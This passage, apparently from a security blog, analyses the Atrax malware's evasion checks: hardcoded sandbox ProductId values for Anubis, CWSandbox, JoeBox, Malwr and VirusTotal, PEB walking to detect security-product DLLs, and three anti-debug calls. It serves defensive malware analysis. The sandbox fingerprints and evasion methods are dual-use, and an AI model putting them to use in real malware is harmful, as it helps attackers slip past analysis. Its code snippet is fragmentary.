Except Anubis, it becomes clear that the detection of sandbox is not fully functional. This dysfunction is due to the method used for environment fingerprinting. Atrax simply looks for the ProductId of the operating system.

ProductId is a unique value of 20 digits which is derived from the product key and the hardware configuration. This key is just displayed to user for information. It can be used when you contact the Microsoft Support. This key is stored in the registry key located here: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId. You can display it by right-clicking My Computer and selecting Properties:

Capture d’écran 2014-08-20 à 14.37.28


Because it is unique, this key enables identifying the computer. However it is possible to alter this key without having any instability.

Atrax has an hardcoded list of ProductId keys:

-   1: 76487-640-1457236-23837
-   2: 76487-644-3177037-23510
-   3: 55274-640-2673064-23950
-   4: 76497-640-6308873-23835
-   5: 76487-640-1464517-23259

If it finds one these values, its means that the actual environment is an online sandbox and Atrax process exits with an access violation.

Capture d’écran 2014-08-20 à 14.39.33


In order to check the correspondence of these values, we developed a test program that display the ProductId value of the sandboxes available on Internet.

Some sandboxes report screenshots of the virtual machine, so it is easy to check the ProductId with a MessageBox. For sandboxes which do not report screenshot, the binary file creates a text file with the ProductId as filename.

long lResult =
RegOpenKeyEx(HKEY_LOCAL_MACHINE,L"Software\\Microsoft\\Windows NT\\CurrentVersion",0,KEY_QUERY_VALUE,&hkey );
if(ERROR_SUCCESS == lResult)
DWORD keytype;
TCHAR data[200];
DWORD bread=200;
lResult =

if(ERROR_SUCCESS == lResult)
// Key found
found = _tfopen(data, TEXT("w"));

With this trick, we have determined that the first key (76487-640-1457236-23837) is the ProductId of Anubis sandbox. This is why the execution inside this sandbox turns into STATUS_ACCESS_VIOLATION.

The second and third keys do not work due to updated sandboxes. These keys are some kind of signature that matches CWSandbox and JoeBox.

76487-644-3177037-23510: matches CWSandbox.

55274-640-2673064-23950: matches JoeBox.

CWSandbox and JoeBox now appear to be a single product: JoeSecurity is accessed through the URL JoeSecurity now automatically generates a new key for each run, making the two previously known keys obsolete. But strangely they are a recognizable pattern easy to detect. For example:

Windows XP:

Windows 7:

Funny fact, during our tests we have to submit several times our fingerprint executable to be sure that the ProductId is unique at each run. This apparently did not please JoeSecurity and our IP address was simply banned from the server.

The last two keys 76497-640-6308873-23835 and 76487-640-1464517-23259 are less common and seem to be related to old instances of Malwr sandbox. Today Malwr generates a unique key for each run with no identifiable pattern:


In addition, although it is not implemented into Atrax, it is possible to detect if an executable file has been uploaded to VirusTotal; the sandbox associated to the “Behavioral information” section has always the same ProductId: 76487-341-0620571-22546.

As we can see, this technique is not really efficient for multiple reasons. First, because it is easy to implement a mechanism to auto generate a ProductId for each run. We tried to edit the ProductId of Windows 7 and Windows Update was fully functional. Moreover, looking at this registry key can be detected as a malicious behavior. It is not common for an executable file to look for the ProductId of the operating system.

Security products detection

Atrax also checksif security productshaveinjectedcode in therunning process of the malware.

To do this check, it uses a well-documented technics:

  • It finds PEB (Process Environment Block address) (instruction mov eax, fs :0x30)
  • It looks for Ldr (LoaderData) in PEB (instruction mov ecx, [eax+0x0C])
  • It finds the InLoadOrderLinks list which contain all the module loaded by the running process (instruction mov edi, [ecx+0x0C])
  • It browses InLoadOrderLinks and compares it to some values.

Capture d’écran 2014-08-20 à 14.54.36


For more information about this method:,

Atrax looks for the following loaded binary files to detect if a security product monitors the current application:

This technique is limited to a few security products but does not prevent detection by antivirus.

Anti Debug

Atrax uses 3 different technics to check the presence of a debugger.


The first way to do it involves using the ZwSetInformationThread function.

IN HANDLE ThreadHandle,
IN THREADINFOCLASS ThreadInformationClass,
IN PVOID ThreadInformation,
IN ULONG ThreadInformationLength

When ThreadInformationClass is set to 0x11 (ThreadHideFromDebugger), any debugger becomes blind to actions performed by this thread.

Capture d’écran 2014-08-20 à 15.00.56



The second way to bypass debug involves using ZwQueryInformationProcess in order to find a debugger.

TSTATUS WINAPI ZwQueryInformationProcess(
_In_       HANDLE ProcessHandle,
_In_       PROCESSINFOCLASS ProcessInformationClass,
_Out_     PVOID ProcessInformation,
_In_       ULONG ProcessInformationLength,
_Out_opt_ PULONG ReturnLength


When ProcessInformationClass is set to 0x7 (ProcessDebugPort), ProcessInformation is set to -1 when the process is being debugged.

Capture d’écran 2014-08-20 à 15.03.33



Finally, Atrax uses the classical IsDebuggerPresent function call which looks for the BeingDebugged flag inside the PEB. If BeingDebugged equals 1, the process is debugged.


Malware’s specifications refer to VM detection. This functionality seems not to be included into the sample that has been studied but we can find some significant strings inside the binary file:

  • VMWare
  • VBOX
  • DiskVirtual_HD

It looks like some codes about VM detection is present but after static analysis we saw that this part of code is never called.


In this post we have seen that an effort was made to detect security products but the detection of analysis environment are not really well implemented. One year after malware launch, it’s fully detected by the sandboxes and the tricks used here are not efficient.Yet there are a huge number of tricks documented on the Internet for anti-debug, anti-VM and anti-analysis. Atrax uses only the most basics tests.

For further information, please see: